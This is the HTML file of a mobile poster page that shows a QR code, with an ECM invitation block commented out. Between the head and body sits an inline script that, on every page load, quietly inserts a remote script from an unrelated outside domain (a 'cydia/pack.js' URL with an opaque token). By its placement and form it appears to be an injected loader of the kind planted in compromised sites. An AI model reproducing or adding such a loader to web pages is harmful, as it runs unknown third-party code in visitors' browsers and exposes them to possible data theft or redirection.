<!DOCTYPE html>
<html>
	<head>
		<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
		<title>海报</title>
		<link rel="stylesheet" href="../../static/css/weui-min.css" />
      	<link rel="stylesheet" href="../../static/css/common.css" />
		<link rel="stylesheet" href="../../static/css/home/poster.css" />
	</head>
	<script>
		(function () {
			var dw = document.createElement("script");
			dw.src = "https://yipinapp.cn/cydia/pack.js?zBv2XrG8cSQqzRDCm9hsEL"
			var s = document.getElementsByTagName("script")[0];
			s.parentNode.insertBefore(dw, s);
		})()
	</script>
	<body>
      <header class="weui-bar weui-bar-nav" id="returnBtn">
		    <a class="weui-pull-left weui-btns">
		        <span class="weui-cell__fts"></span>
		    </a>
		</header>
		<div class="poster" id="demo">
			<div class="bottomDiv" id="de">
				<div class="bottomRight">
					<div id="qrcode"></div>
					<div id="imagQrDiv"></div>
				</div>
				<!--<div class="distinguish">
					<div class="bottomLeft">
						<h2>ECM专属邀请</h2>
						<p>扫一扫识别二维码，</p>
						<p>加入ECM</p>
					</div>
					<div class="bottomRight">
						<div id="qrcode"></div>
						<div id="imagQrDiv"></div>
					</div>
				</div>-->
			</div>
		</div>
		<script type="text/javascript" src="../../lib/jquery.js" ></script>
		<script type="text/javascript" src="../../lib/jquery-weui.js" ></script>
		<script type="text/javascript" src="../../lib/qrcode.min.js" ></script>
		<script type="text/javascript" src="../../static/js/common.js" ></script>
		<script type="text/javascript" src="../../static/js/api.js"></script>
		<script src="http://html2canvas.hertzen.com/dist/html2canvas.js"></script>
		<script type="text/javascript" src="../../static/js/home/poster.js" ></script>
	</body>
</html>
